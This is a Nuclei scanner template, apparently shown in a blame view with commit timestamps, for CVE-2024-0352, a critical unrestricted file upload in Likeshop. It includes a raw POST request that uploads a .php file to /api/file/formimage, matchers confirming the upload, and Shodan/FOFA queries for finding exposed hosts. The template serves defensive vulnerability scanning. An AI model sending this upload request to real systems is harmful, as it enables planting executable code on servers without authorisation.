2024-01-10 10:06:24 +00:00
id : CVE-2024-0352
info :
2024-01-10 13:40:00 +00:00
name : Likeshop < 2.5.7.20210311 - Arbitrary File Upload
2024-01-10 10:06:24 +00:00
author : CookieHanHoan,babybash,samuelsamuelsamuel
2024-01-29 17:11:14 +00:00
severity : critical
2024-01-10 10:06:24 +00:00
description : |
A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434
impact : |
The product allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. As an impact it is known to affect confidentiality, integrity, and availability.
remediation : Update to the latest version
reference :
2024-01-10 13:40:00 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2024-0352
2024-01-14 13:49:27 +00:00
- https://note.zhaoj.in/share/ciwYj7QXC4sZ
- https://vuldb.com/?ctiid.250120
- https://vuldb.com/?id.250120
2024-01-29 17:11:14 +00:00
- https://github.com/tanjiti/sec_profile
2024-01-10 10:06:24 +00:00
classification :
2024-01-29 17:11:14 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2024-01-10 10:06:24 +00:00
cve-id : CVE-2024-0352
cwe-id : CWE-434
2024-05-31 19:23:20 +00:00
epss-score : 0.0086
epss-percentile : 0.82263
2024-01-29 17:11:14 +00:00
cpe : cpe:2.3:a:likeshop:likeshop:*:*:*:*:*:*:*:*
2024-01-10 10:06:24 +00:00
metadata :
verified : true
max-request : 1
vendor : likeshop
2024-01-29 17:11:14 +00:00
product : likeshop
2024-01-14 13:49:27 +00:00
shodan-query : http.favicon.hash:874152924
2024-05-31 19:23:20 +00:00
fofa-query : icon_hash=874152924
2024-01-14 13:49:27 +00:00
tags : cve,cve2024,rce,file-upload,likeshop,instrusive,intrusive
2024-01-10 10:06:24 +00:00
variables :
filename : "{{rand_base(6)}}"
http :
- raw :
- |
POST /api/file/formimage HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
User-Agent : Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
------WebKitFormBoundarygcflwtei
Content-Disposition : form-data; name="file";filename="{{filename}}.php"
Content-Type : application/x-php
2024-01-10 13:40:00 +00:00
{{randstr}}
2024-01-10 10:06:24 +00:00
------WebKitFormBoundarygcflwtei--
matchers :
- type : dsl
dsl :
- 'status_code == 200'
- 'contains(body, "\"name\":\"{{filename}}.php\"")'
2024-01-10 13:40:00 +00:00
- 'contains_all(body, "code\":1", "base_url\":\"uploads\\/user")'
2024-01-10 10:06:24 +00:00
condition : and
2024-01-10 13:40:00 +00:00
2024-01-10 10:06:24 +00:00
extractors :
- type : json
part : body
json :
2024-01-10 13:40:00 +00:00
- ".data.url"
2024-06-01 06:53:00 +00:00
# digest: 4a0a00473045022100f918936fafffcf93421ce086207f2283925cd669ecc632d7ed2bc75094b855a802200fd6828f58d3fe1ed11a252d611b4b5a317e232fcc89bb3d80c103e17ea3ac4e:922c64590222798bb761d5b6d8e72950